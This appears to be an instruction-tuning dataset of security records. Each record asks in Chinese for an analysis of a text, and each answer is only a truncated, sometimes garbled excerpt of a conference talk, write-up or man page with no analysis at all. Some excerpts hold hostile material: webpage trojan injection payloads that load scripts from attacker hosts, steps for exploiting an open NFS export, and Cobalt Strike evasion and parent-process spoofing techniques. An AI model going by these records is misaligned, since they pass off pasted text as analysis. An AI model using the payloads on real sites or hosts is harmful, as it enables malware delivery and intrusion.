{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTLS$Canary$ Keeping$your$dick$pics$ safe(r)$ US$  Evilrob$  Rob$Bathurst$  Director$for$Healthcare/Biomedical$Security$  Cylance$  xaphan$  Jeff$Thomas$  Plays$with$other$people's$computers$  Is$barely$awake$right$now$ \"The$good$news$is$that$there's$no$ program$named$the$'dick$pic'$program.$ The$bad$news...$they$are$sNll$collecNng$ everybody's$informaNon,$including$ your$dick$pics.\"$ PP$Edward$Snowden$ Wouldn't$we$all?$ (Please don't sue us, John.) How$the$Tubes$Work$  HTTP$  Your$data$is$not$protected$  Duh$  I$mean$really$  How$your$data$is$protected$  HTTPS$  EncrypNon$suites$$ Tubes$Part$Two$  HTTPS$  SSL$  Where$did$it$come$from?$  How$does$it$work?$  Why$its$old$and$busted$  TLS$  New$and$Improved!$  VPN$  VPN$everything?$  EndPtoPEnd$vs$VPN$  Difficulty$$ More$Tubes!$  SSH$  Does$it$blend?$  SFTP$  Does$it$blend?$  DNSSEC$  Does$it$blend?$ CerNficates$  WTF?$  How$do$they$work?$  What$do$we$do$with$them?$  What$are$Cert$Chains?$  What$is$Cert$Pinning?$ WTF$is$this$cert$for?$  History$  Secure$Networking$Program$  Netscape$  Dr.$Taher$Elgamal$  SSL$  RFC$6101$  SSL$1.0$  RFC$6176$  TLS$1.2$  TLS$1.3$(drab)$ How$does$a$cert$work$(basically)?$  Its$all$built$on$trust$  It$doesnt$always$work$  And$is$broken$  Legit$certs$are$signed$by$a$trusted$CA$$  Our$browsers$trust$anything$signed$by$that$ root$CA$  You$cant$change$that$  Sessions$get$negoNated$by$magic$  You$send$your$dick$pics$through$ What$do$we$do$with$them? $$  Literally$anything$related$to$idenNty$$  Device$certs$  User$certs$  ApplicaNon$certs$  Oprah$Style$distribuNon$  Certs$for$your$mom!$  Certs$for$your$cat!$  Certs$for$everyone!$ Why$This?$  Do$we$hate$TLS?$  Are$you$sure?$  VPNs$suck$  Things$we$actually$like$  Ourselves$  Some$of$you$  Systems$that$are$not$built$on$blind$trust$ Chain$of$Fools$  I$am$trusted$by$the$world$  You$trust$me$  You$pay$me$money$  I$sign$your$cert$$  Your$cert$is$now$trusted$by$anyone$who$ trusts$me$  Which$is$everyone,$because$Im$in$your$root$store$doing$root$stuff$  You$can", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n網路入侵攻擊實錄 中小馬被掛馬潘朵拉 no-name 大綱  瀏覽網站中小馬---使用者  網站被掛馬畫面(未公布資訊)  中木馬- 天知 地知 就是我不知  看網站有那麼嚴重嗎?(Blog_Clickjacking&影音網馬)  網站入侵掛馬實錄---伺服器  網站洩露多少重要資訊  使用開發套件網站安全嗎  網站入侵實戰(入侵網站後台系統)  躲在後面的神密客 ---駭客Botnet  Botnet 掛馬跳板主機  入侵Botnet主機(Botnet主機入侵過程手法)  打開潘朵拉的盒子(Botnet主機資訊) 使用者 個資 網站 伺服器 Botnet 駭客 No-name 被植入後門程 式側錄密碼 被當成散播木 馬平台 殭屍主機!! (駭客分身術) 瀏覽網站中小馬 網站被掛馬畫面(未公布資訊) 中木馬- 天知 地知 就是我不知 看網站有那麼嚴重嗎?(Blog_Clickjacking&影音網馬) 受駭網站名單 被公告的受駭網站在上面那沒有被公告的網站呢???? 中木馬- 天知 地知 就是我不知 使用者 Internet F/W 網站伺服器 資料庫 檔案 駭客 Port:80 瀏覽資訊網拍 登入帳號 找尋漏洞入侵 掛馬 <script src= http://%77%76%67%33%2E%63%6E></script> 使用者點選網馬過程完全沒有感覺!!即受駭下載木馬 常見網頁掛馬語法  Iframe的網馬 <iframe src=http://XX.XX.XX.XX width=0 height=0></iframe>  JScript 的網馬設計 xxx.js檔案程式如下: 然後將此檔案利用任何方式上傳至目標主機 document.write(\"<iframe width='0' height='0' src=' http://XX.XX.XX.XX '></iframe>\");  JScript 掛馬的語法為 <script language=javascript src=xxx.js></script>  JScript 變型加密的網馬 <SCRIPT language=JScript.Encode src=http://XX.XX.XX.XX/muma.txt></script> muma.txt 可改成任何附檔名  body 的網馬 <body onload=\"window.location=' http://XX.XX.XX.XX ';\"></body>  隱藏的網馬 top.document.body.innerHTML = top.document.body.innerHTML + '\\r\\n<iframe src=\"http://XX.XX.XX.XX/muma.htm/\"></iframe>'; 常見網頁掛馬語法(cont.)  CSS 的網馬先將製作好的muma.js 先利用各種方式上傳至目標處 body { background-image: url('javascript:document.write(\"<script src=http://XX.XX.XX.XX/muma.js></script>\")')}  JAVA 的網馬 <SCRIPT language=javascript> window.open (\"http://XX.XX.XX.XX\",\"\",\"toolbar=no,location=no,directories=no,status=no, menubar=no,scro llbars=no,width=1,height=1\"); </script>  圖片偽裝網馬 <html> <iframe src=\" http://XX.XX.XX.XX \" height=0 width=0></iframe> <img src=\" http://XX.XX.XX.XX/1.jpg\"> </html>  編碼轉換網馬 ascii編碼轉換 <script src= http://%77%76%67%33%2E%63%6E></script> 常見網頁掛馬語法(cont.)  偽裝呼叫網馬 <frameset rows=\"444,0\" cols=\"*\"> <frame src=\"開啟的網頁\" framborder=\"no\" scrolling=\"auto\" noresize marginwidth=\"0\"margingheight=\"0\"> <frame src=\" http://XX.XX.XX.XX \" frameborder=\"no\" scrolling=\"no\" noresize marginwidth=\"0\"margingheight=\"0\"> </frameset>  欺騙超連結", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSo You Think Your Domain Controller Is Secure? Justin Hendricks @Script_Happens Abstract Domain Controllers are the crown jewels of an organization. Once they fall, everything in the domain falls . Organizations go to great lengths to secure their domain controllers, however they often fail to properly secure the software used to manage these servers. This presentation will cover unconventional methods for gaining domain admin by abusing commonly used management software that organizations deploy and use. Presentation Materials Visit https://scripthappens.azurewebsites.net/ for the full presentation, sample code, and demo videos.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttacking The Internet of Things (using time) Paul McMillan Who am I? There are many ways to attack the Internet of Things Demo (start) What is a timing attack? def authenticate_user(user, pass): stored_hash=get_password_hash(user): if stored_hash: test_hash = sha1(password) if test_hash == stored_hash: Return True Else: Return False Many Kinds  User Enumeration  Blind SQL Injection  CPU Cache attacks against crypto  Local  Cross-VM  Lucky 13  Many more... String Comparison Timing Attacks memcmp while (len != 0) { a0 = ((byte *) srcp1)[0]; b0 = ((byte *) srcp2)[0]; srcp1 += 1; srcp2 += 1; res = a0 - b0; if (res != 0) return res; len -= 1; } MASSIVE Speedup c = character set n = Length of string Brute Force: cn Timing Attack: c * n (* x) (x is # tries to distinguish) Why are they interesting? What are the drawbacks? Let's talk about time Internet SF-NY 70ms Spinning Disk 13ms Ram Latency 83ns L1 cache 1ns 1 cpu cycle ~0.33ns Speed of light in network cable 1 meter in ~5ns 200 meters ~1µs So... how long does each byte of that string comparison take? nanoseconds (on a modern 3Ghz machine) What about something a little slower? Network timing precision Sources of Imprecision Graphics drivers Background networking USB Devices Power saving measures Audio devices Etc. Software Timestamps are noisy. Let's use hardware! (picture of i350 + adapter) Data Collection Generate repeated traffic TCPdump the packets Analyze the data Feed back to traffic gen Making things work  Libpcap 1.5.0+  TCPDump 4.6.0+ (released July 2, 2014)  Recent-ish Kernel Compile these from source. In theory, this might work on OSX? It works on Ubuntu 14.04 for me. Nanoseconds. Ugh!  Scapy doesn't read the pcap files  Neither do most other packages  Wireshark does!  Nanosecond timestamps lose precision if you convert them to a float()  So we subtract a large offset, and don't work with raw timestamps.  Use integer Nanoseconds rather than float seconds What is the Hue API?  GET /api/<user token>/lights  Bas", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdvanced SQL Injection Presented By: Joe McCray joe@learnsecurityonline.com http://twitter.com/j0emccray http://www.linkedin.com/in/joemccray The Last of a Dying Breed A Network Penetration Tester You know  the nmap, exploit, upload netcat type of guy. A.K.A: The only black guy at security conferences Joe McCray.... Who the heck are you? Step 1: Tell customer you are 31337 security professional Customers only applied patches if it fixed something on the system It was common practice NOT to apply system updates that didn't fix a problem you were experiencing on a system (WTF ARE YOU DOING - YOU MIGHT BREAK SOMETHING!!!!!) Step 2: Scan customer network with ISS or Nessus if you were a renegade Customers didn't apply patches, and rarely even had firewalls and IDSs back then You know you only ran ISS because it had nice reports... Step 3: Break out your uber 31337 warez and 0wn it all!!!!! You only kept an exploit archive to save time (Hack.co.za was all you needed back then) If you could read the screen you could 0wn the network!!!!!!! Penetration Testing Was Easy.... If you were Ub3r 31337 you did it like this.... Port Scan & Banner Grab The Target Get your exploit code... Own the boxes and take screen-shots Write The Report... Get Paid.... More Security Measures are being implemented on company networks today Firewalls are common place (perimeter and host-based) Anti-Virus is smarter (removes popular hacker tools, and in some cases stops buffer overflows Intrusion Detection/Prevention Systems are hard to detect let alone bypass NAC Solutions are making their way into networks Network/System Administrators are much more security conscious IT Hardware/Software vendors are integrating security into their SDLC Geez...That's A Lot To Bypass ...I used to think Web App Security was stupid sh*t This stuff isn't hacking\" but then I saw demo of a tool called sqlninja upload nc.exe to a host vulnerable to sql injection I was hooked!!!!!!!!!!!!!!!!!!!! What Did It For Me Getting", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH QUOTAON 8 \"Fri Mar 09 2001\" .UC 4 .SH NAME quotaon \\- 开启关闭文件系统配额 .SH \"总览 (SYNOPSIS)\" .B quotaon [ .B -e | .B d ] [ .B -vug ] .IR filesystem .\\|.\\|. .br .B quotaon [ .B -e | .B d ] [ .B -avug ] .PP .B quotaoff [ .B -e | .B d ] [ .B -vug ] .IR filesystem .\\|.\\|. .br .B quotaoff [ .B -e | .B d ] [ .B -avug ] .SH \"描述 (DESCRIPTION)\" .IX \"quotaon 命令\" \"\" \"\\fLquotaon\\fP \\(em 打开文件系统配额\" .IX \"用户配额\" \"quotaon 命令\" \"\" \"\\fLquotaon\\fP \\(em 打开文件系统配额\" .IX \"磁盘配额\" \"quotaon 命令\" \"\" \"\\fLquotaon\\fP \\(em 打开文件系统配额\" .IX \"配额\" \"quotaon 命令\" \"\" \"\\fLquotaon\\fP \\(em 打开文件系统配额\" .IX \"文件系统\" \"quotaon 命令\" \"\" \"\\fLquotaon\\fP \\(em 打开文件系统配额\" .IX \"quotaoff 命令\" \"\" \"\\fLquotaoff\\fP \\(em 关闭文件系统配额\" .IX \"用户配额\" \"quotaoff 命令\" \"\" \"\\fLquotaoff\\fP \\(em 关闭文件系统配额\" .IX \"磁盘配额\" \"quotaoff 命令\" \"\" \"\\fLquotaoff\\fP \\(em 关闭文件系统配额\" .IX \"配额\" \"quotaoff c命令\" \"\" \"\\fLquotaoff\\fP \\(em 关闭文件系统配额\" .IX \"文件系统\" \"quotaoff 命令\" \"\" \"\\fLquotaoff\\fP \\(em 关闭文件系统配额\" .LP .B quotaon 通知系统在一个或者几个文件系统上使用磁盘配额 .B quotaoff 通知系统取消某一个特定的文件系统的所有磁盘配额 被指定的文件系统必须已经装载 .B quotaon 要求在指定的文件系统的根目录下有相应的配额文件 用户配额文件是 .IR aquota.user  组配额文件是 .IR aquota.group  这些文件可以是用 .BR convertquota (8) 命令转换旧的配额文件而来 也可以是用 .BR quotacheck (8) 命令创建的一个全新的文件 默认是用户和组配额 都被允许 .SH \"选项 (OPTIONS)\" .TP .B -e 开启指定文件系统配额 当程序名是 .B quotaon 时 此选项是默认的 . .TP .B -d 关闭指定文件系统配额 当程序名是 .B quotaoff 时 此选项是默认的 . .TP .B -a 当用在任何文件系统名称的地方时 .B quotaon/quotaoff 将允许/禁止所有在 .B /etc/mtab 中指定的文件系统为有磁盘配额的读-写 这个选项一般被用在系统启动时开启配额 .TP .B -v 为每个开启或关闭配额的文件系统显示一条消息 .TP .B -u 处理用户配额 这是默认选项 .TP .B -g 处理组配额 .LP .SH \"文件 (FILES)\" .PD 0 .TP 20 .B aquota.user 文件系统根目录下的用户配额文件 .TP .B aquota.group 文件系统根目录下的组配额文件 .TP .B /etc/mtab 已装载的文件系统表 .PD .SH \"参见 (SEE ALSO)\" .BR quota (1), .BR quotactl (2), .BR fstab (5), .BR convertquota (8), .BR quotacheck (8), .BR setquota (8), .BR edquota (8), .BR repquota (8) .SH \"作者 (AUTHOR)\" Jan Kara \\<jack@atrey.karlin.mff.cuni.cz\\> .SH \"[中文版维护人]\" .B 唐友 \\<tony_ty@263.net\\> .SH \"[中文版最新更新]\" .BR 2001/7/13 .SH \"[中国 Linux 论坛 man 手册页翻译计划]\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1564-001-linux-隐藏文件和目录 ## 来自ATT&CK的描述 为了防止普通用户误操作更改系统上的特殊文件大多数操作系统都具有隐藏文件的概念当用户使用GUI浏览文件系统或在命令行上使用普通命令时这些文件不会显示用户必须明确要求通过一系列图形用户界面GUI提示或命令行查看隐藏文件例如windows下的dir /alinux或MAC下的ls -a命令等 攻击者可以利用这一点来隐藏系统中任何位置的文件和文件夹以便持久化并逃避不进行隐藏文件分析的用户或分析师 linux/mac 用户可以将特定文件标记为隐藏只需将.作为文件或文件夹名称中的第一个字符默认情况下以点.开头的文件和文件夹无法在Finder应用程序和标准命令行实用程序如ls中查看用户必须专门更改设置才能查看这些文件对于命令行用法通常会有一个标志来查看所有文件包括隐藏文件要在Finder应用程序中查看这些文件必须执行以下命令defaults write com.apple.finder AppleShowAllFiles YES然后重新启动Finder应用程序 ## 测试案例 ```bash mkdir .xx -a #创建一个隐藏文件夹 mv file to a .file #移动文件到目录a下并修改为隐藏文件 ``` ## 检测日志 bash历史记录 值得注意的是你可以从一些特定目录路径中查找到隐藏文件/目录并将其转储到某个位置提取出可以文件夹并查找恶意隐藏文件 ## 测试复现 ```bash icbc@icbc:/xx$ sudo mkdir .xx-a icbc@icbc:/xx$ sudo mv 1.sh /xx/.sh ``` ## 测试留痕 ```bash icbc@icbc:/$ history 1 sudo mkdir .xx-a 2 sudo mv 1.sh /xx/.sh ``` ## 检测规则/思路 ### splunk规则 index=linux sourcetype=bash_history bash_command=\"mkdir .*\" | table host,user_name,bash_command index=linux sourcetype=bash_history bash_command=\"mv *.*\" | table host,user_name,bash_command ### 建议 值得注意的是你也可以通过命令直接在问题主机上进行查找当然你可以使用白名单来过滤掉linux系统中的标准隐藏文件/目录这样可以减轻误报 find_hidden_files.sh ```dos find /home/ -name \".*\" find /home/ -type d -name \".*\" find /home/ -type f -name \".*\" ``` ## 相关TIP [[T1564-001-win-发现攻击者在回收站中隐藏恶意软件]] [[T1564-001-win-隐藏的文件和目录]] [[T1564-003-win-隐藏窗口]] ## 参考推荐 MITRE-ATT&CK-T1564-001 <https://attack.mitre.org/techniques/T1564/001/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBUILDING AN ANDROID IDS ON NETWORK LEVEL Jaime Sanchez @segofensiva http://www.seguridadofensiva.com jsanchez@seguridadofensiva.com 2 $ WHO I AM  Passionate about computer security.  Computer Engineering degree and an Execu7ve MBA.  In my free 7me I conduct research on security and work as an independent consultant.  Im from Spain; Were sexy and you know it.  Other conferences:  RootedCON in Spain  Nuit Du Hack in Paris  Black Hat Arsenal USA  Next months: DerbyCON and Hack7vity. BUILDING AN ANDROID IDS ON NETWORK LEVEL DEFCON 21 3 DEFCON 21 BUILDING AN ANDROID IDS ON NETWORK LEVEL FIRST TIME IN LAS VEGAS !! 4 DEFCON 21 BUILDING AN ANDROID IDS ON NETWORK LEVEL  Being popular is not always a good thing.  Mobile malware and threats are clearly on the rise.  Over 100 million Android phones shipped in the second quarter of 2012 alone.  Targets this large are difficult for aNackers to resist! WHY? 5 DEFCON 21 BUILDING AN ANDROID IDS ON NETWORK LEVEL USSD EXPLOIT WEBKIT VULNERABILITIES TARGETED MALWARE !!! METERPRETER FOR ANDROID !!! 6 DEFCON 21 BUILDING AN ANDROID IDS ON NETWORK LEVEL  In order to analyze the traffic flows well create a VPN tunnel between our Android device and our computer.  Configure and launch snort on the remote machine to detect suspicious traffic.  We can also use tools like tcpdump to capture traffic for later analysis. FIRST APPROACH VPN eth0:WiFi rmnet0: 3G snort tcpdump 7 DEFCON 21 BUILDING AN ANDROID IDS ON NETWORK LEVEL PROBLEMS 8 DEFCON 21 BUILDING AN ANDROID IDS ON NETWORK LEVEL CONTINUED MY LIFE ...  OSfooler is a pracIcal approach presented at Black Hat Arsenal USA 2013. It can be used to detect and defeat acIve and passive remote OS fingerprinIng from tools like nmap, p0f or commercial appliances. FUCK YEAH!! KERNEL SPACE USER SPACE  KERNEL SPACE is strictly reserved for running the kernel, kernel extensions, and most device drivers.  USER SPACE usually refers to the various programs and libraries that the operaIng system uses to interact with the ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Musicetry (Misc 200) ``` They should have forbidden this from the moment they hear abou the idea! Damn circles, rectangles is all we needed! ``` ###ENG [PL](#pl-version) In the task we get a webpage with a CD picture. We thought this might be stegano, but the picture was `.jpg` and it was hotlinked from a legitimate webpage so we figured it can't be it. We noticed also a strange `data` cookie set by the webpage. There were 4 different cookies we could get: ``` ## %% ``` ``` ## %% %++ %++ %++ %++ @* %++ @* #% %# %++ %++ %++ %++ %++ @** %% %++ %++ @* %# ## #% %++ %++ %++ %++ @** %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ @** ## %% %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ @* ``` ``` ## %% %++ %++ %++ %++ %++ %++ %++ %++ @* %++ @* %++ %++ %++ %++ %++ @* %++ %++ %++ %++ %++ %++ @* %% ## ``` ``` ## %% %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ @* %# %++ @** %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ %++ @** %# %++ %++ %++ %++ %++ @*** ``` One of our friends spent once a few hours on a CTF reversing a certain brainfuck-like language from scratch, using only the code which should print a flag (we know the flag prefix). Later it turned out that this was an actual esoteric language with a specification... Anyway, our friend instantly recognized `data` payload as code for TapeBagel language. And we already had interpreter for it: https://github.com/p4-team/ctf/tree/master/2016-02-20-internetwache/re_80 So we used the interpreter to decode the inputs, getting `HINT`, `TAPE`, `DEFCESO`. This was a big WTF for us, because we were sure this is just a hint for the task solution, so we were trying to google anything related, to no avail. In the end one of our friends just checked if md5 of `DEFCESO` is not a flag, and it was... ###PL version W zadaniu dostajemy linkkdo strony z obrazkiem płyty CD. Myśleliśmy początkowo że może to być stegano, ale obrazek był `.jpg` i był linkowany z prawdziwej strony", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Picture is Worth a Thousand Words, Literally: Deep Neural Networks for Social Stego Philip Tully and Michael T. Raggo Abstract and Introduction Images, videos and other digital media provide a convenient and expressive way to communicate through social networks. But such broadcastable and information-rich content provides ample illicit opportunity as well. Web-prevalent image files like JPEGs can be disguised with foreign data since theyre perceivably robust to minor pixel and metadata alterations. Slipping a covert message into one of the billions of daily posted images may be possible, but to what extent can steganography be systematically automated and scaled? To explore this, we first report the distorting side effects rendered upon images uploaded to popular social network servers, e.g. compression, resizing, format conversion, and metadata stripping. Then, we build a convolutional neural network that learns to reverse engineer these transformations by optimizing hidden data throughput capacity. Pre-uploaded and downloaded image files teach the network to locate candidate pixels that are least modifiable during transit, allowing stored hidden payloads to be reliably recalled from newly presented images. Deep learning typically requires tons of training data to avoid overfitting. But data acquisition is trivial using social networks free image hosting services, which feature bulk uploads and downloads of thousands of images at a time per album. We show that hidden data can be predictably transmitted through social network images with high fidelity. Our results demonstrate that AI can hide data in plain sight, at large-scale, beyond human visual discernment, and despite third-party manipulation. Steganalysis and other defensive forensic countermeasures are notoriously difficult, and our exfiltration techniques highlight the growing threat posed by automated, AI-powered red teaming. Contents Abstract and Introduction 1 The Evolution of Steganography DIY Social S", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# NFS未授权访问漏洞 ## 漏洞描述 NFSNetwork File System是一种网络文件系统允许在不同的网络主机上共享文件当NFS服务器未正确配置或缺少访问控制机制时可能存在未授权访问漏洞攻击者可以利用此漏洞访问受影响主机上的文件和数据甚至可以修改或删除敏感信息 ## 环境搭建 ``` # 安装nfs服务 yum install nfs-utils.x86_64 -y # 启动服务 systemctl start nfs-server.service # 设置开机自启 systemctl enable rpcbind.service systemctl enable nfs-server.service # 配置nfs vim /etc/exports / *(rw,sync,no_root_squash) # 启动共享 exportfs -r ``` ## 漏洞利用 查看共享 ``` [root@localhost tmp]# showmount -e Export list for localhost.localdomain: / * ``` 客户端挂载命令 ``` mkdir /tmp/test mount -t nfs 192.168.32.183:/ /tmp/test ``` 扫描nfs ``` [root@localhost tmp]# rpcinfo -p 192.168.32.183 program vers proto port service 100000 4 tcp 111 portmapper 100000 3 tcp 111 portmapper 100000 2 tcp 111 portmapper 100000 4 udp 111 portmapper 100000 3 udp 111 portmapper 100000 2 udp 111 portmapper 100005 1 udp 20048 mountd 100005 1 tcp 20048 mountd 100005 2 udp 20048 mountd 100024 1 udp 38880 status 100005 2 tcp 20048 mountd 100024 1 tcp 60551 status 100005 3 udp 20048 mountd 100005 3 tcp 20048 mountd 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs 100227 3 tcp 2049 nfs_acl 100003 3 udp 2049 nfs 100003 4 udp 2049 nfs 100227 3 udp 2049 nfs_acl 100021 1 udp 48592 nlockmgr 100021 3 udp 48592 nlockmgr 100021 4 udp 48592 nlockmgr 100021 1 tcp 42350 nlockmgr 100021 3 tcp 42350 nlockmgr 100021 4 tcp 42350 nlockmgr ``` 查看挂载的目录会出现所有的/目录下的文件 ``` ls /tmp/test/ ``` ![image-20230129213959283](../../.gitbook/assets/image-20230129213959283.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n我的CS笔记之- In-memory Evasion 3 0x00 前言 前2部分讲了侦测手法CS payload的加载细节这一部分主要讲怎么逃逸了主要是使用CS自身的 C2profile来改变payload的加载行为目前看来这些对抗手段已经是标配了攻防对抗是一个水涨船高 的过程标配都没搞好天天去搞更强的对抗就有点浮夸我们一步一步来 0x01 普通逃逸和CS的相关配置 在In-memory Evasion 3中逃逸主要还是围绕着In-memory Evasion 1中的3个部分展开 我们先来回顾异常指标 线程开始地址异常 当前进程 公鸡程序常常是申请一个内存写入公鸡代码然后使用createThread执行这个内存地 址指针 正常程序是创建一个函数createThread执行这个函数因此模仿就好了 远程线程 通过劫持一个已经存在的线程比修改线程开始地址好SetTheadContext 通过LoadLibrary导入一个存在的DLL然后在内存中替换从我们的公鸡代码使用 CreateRemoteThread启动线程这样看起来你似乎是在执行一个硬盘存在的正常dll 内存权限异常 避免RWX 映射页权限看上去是很合理的映射一个DLL并且覆盖它的内存 内存内容异常 不要看起来像一个DLL除非这个DLL是程序预期的情况 混淆和删除可能被用于分析的字符串 混淆内存当代码不被使用的时候 在CS中的相关对抗方法 线程开始地址异常 使用EXEDLL artifacts 使用Process Hollowing(x64->x86, x64->x64)CS的Post-exploitation jobs已经这样做了 避免注入到存在的远程进程 内存权限异常 避免使用artifactscs中哪些是artifacts看上一篇中的表它使用RWX权限 避免使用stagers避免使用cs中分阶段的加载 在C2profile中配置userwx为false 内存内容异常 在beacon的前后增加花指令 替换各种可能被作为特征的字符串 嵌入任意字符串 编辑PE头 开启混淆 Author: L.N. / Date: 2021-09-07 Produced by AttackTeamFamily No. 1 / 4 - Welcome to www.red-team.cn 最后配置好了以上修改我们怎么来检测我们配置的效果呢Attacks -> Packages -> Windows EXE(s) 使用raw的输出格式然后使用一下3种命令都可以查看我们可以对比配置前和配置后 以上是常规的对抗规避手法如果仅仅只是做好以上的目前来看是不做一定被杀做了也不一定能 免杀还需要更多的其他手段才能在目前的对抗环境下生存 0x02 进程上文和Session Prepping 进程链也叫进程树的异常也是被防御软件采用的一种查杀手法这个很多小伙伴多多少少都是听说 过的例如word.exe起一个powershell.exe或者cmd.exe这个父子经常就容易被防御软件阻断 那么如何来提升进程的信誉度呢作者给出了一下几个方法 数字证书 一个可信的父进程 不要用一个经常在攻击行动种出现的进程例如rundll32这个都快被用烂了 Session Prepping这个我也不知道怎么翻译意思是派生一个新进程通过以下操作让这个新进程看 上去很正常 使用ps命令查看当前电脑的进程情况 使用ppid指定一个父进程 使用spawnto [arch] [path] 改变cs的模板进程 这考验的就是个人对异常进程链和正常进程链的理解了例如你模板进程是werfault.exe父进程是 explorer.exe我们知道了父进程的pid在spawnto指定模板进程的使用给werfault.exe加上参数 这样看起来就比较正常尽量模仿正常的进程树就行了各种细节到位这除了伪造以外作者还想表 达一个思想就是用派生进程执行攻击即使触发拦截被杀你还有其他session他举例了他们团队的 小伙伴就是没有派生进程导致立柱点掉了这个和测waf一个思想你不要再漏洞点上测waf选一个 其他地方测试测试完了再去漏洞点利用 最后作者给了一张CS里面Artifacts的异常指标图大家使用的时候可以对照下 strings -e |beacon.bin strings beacon.bin hexdump -C beacon.bin spawnto x64 c:\\windows\\sysnative\\werfault.exe -u -p <父进程pid> Author: L.N. / Date: 2021-09-07 Produced by AttackTeamFamily No. 2 / 4 - Welcome to www.red-team.cn 0x0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLight & Shadow about Net-Banking $ecurity @ Japan @2013 HITCON 愛奴 & 愛花 Punpun maru Profile  Started lecturing and writing as a freelancer since 2000  AVTOKYO Speaker (2010, 2011, 2012)  Wrote Introduction of Information Security  for the textbook of universities  Regular writer for Hacker Japan Magazine   Serious day job around Financial Industry Profile 愛奴愛花 Aido & Manaka  I successfully took her out from the virtual game world.  I am presenting about how beautiful life with Girlfriend  Please see Every day of love 京都 伏見稲荷大社 Fushimi Inari Taisha Snowball fight against Japan CTF team UCQ tessy CTF Team Lovers Team Famous Castle in Japan Himeji Castle World Heritage Kumamoto Castle Agenda  Background  History  Data and Statics  Light and Shadow of net-banking security practices  Cost and work amount  Business Strategy  Power balance against Systems Integrators  The result of a Power Balance  Studies and Solutions  Screen Keyboard  Eliminating Popup Windows  S/MIME mail  Password Reminder  One Time Password (Bingo Card)  One Time Password (send by e-mail)  Secure Browser  Password Number(PIN)  Telephone Banking Background 8  In order to prevent drawing money by fraud, phishing or spyware, many banks performed original various measures in Japan.  It's unfortunate but they failed to protect their customers from a crime.  I will explain the light and the shadow of those measures. History 9  1997/01 The first net-banking services was launched by Sumitomo Bank.  2000/01 The first bank provides all services via the internet, was established.  2005 Phishing fraud mail posing Mega-Bank (Bank of Tokyo-Mitsubishi UFJ) was found.  2006 The first damege by phishing fraud was found at E-bank (Rakuten Bank, today).  2007 Phishing fraud site have users enter all numbers on Bingo Card was found at Shinsei Bank (First Case).  2011 Simultaneous multiple phishing fraud (use spyware) posing regional banks occurred in later half of the year.  2012 Phishing fraud site have users enter all ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CONFidence 2019 CTF Teaser Post Mortem Hi all, thanks for playing CONFidence 2019 CTF Teaser! Now the CTF is over, so we'd like to dump some data, share some perspective, and show how things worked from behind the scenes. Also, please be aware that it was just a teaser - the real event will happen 3-4 June in Krakow. Top teams will receive free conference passes (wait for an email), but everyone is invited as long as you show up at the conference with a valid ticket. ## 1. Challenges 546 teams registered, of which 522 solved at least one challenge. We prepared 16 challenges, all of which were solved. ![](skoroboro.png) The hardest challenge (judging by the number of solves) was game_server. The easiest challenge (ignoring the sanity check) was admin_panel, closely followed by elementary and count. | Challenge name | Solves | | ---------------| ------| | game server | 7 | | p4fmt | 10 | | go machine | 10 | | lottery | 11 | | watchmen | 13 | | sloik | 14 | | neuralflag | 22 | | web_50 | 29 | | pudliszki | 37 | | oldschool | 37 | | really suspicious acronym | 52 | | bro, do you even lift | 65 | | count me in! | 115 | | elementary | 123 | | my admin panel | 151 | | sanity check | 522 | In retrospect, there could be more hard challenges. We underestimated you and thought that 24 hours is not enough time to hack all of our tasks. We were wrong ;). However, only one team managed to solve all our challenges (congratz, hxp), so it's not too bad. On the other hand, some people complained that even the easiest tasks were challenging, and wished for something more beginner-friendly. We'll work on that next time! Also, we need more pwn challenges. We had some of them planned, but life happened and they were not ready for the CTF. Sorry to all the pwn-lovers that had nothing to do (except for the pwning the kernel in p4fmt, of course). ## 2. Survey Ok, we had some challenges, but were they any good? Let's ask the players. Our survey was filled in by 39 people, most of whom were", "category": "text_analysis", "source": "security_papers"}
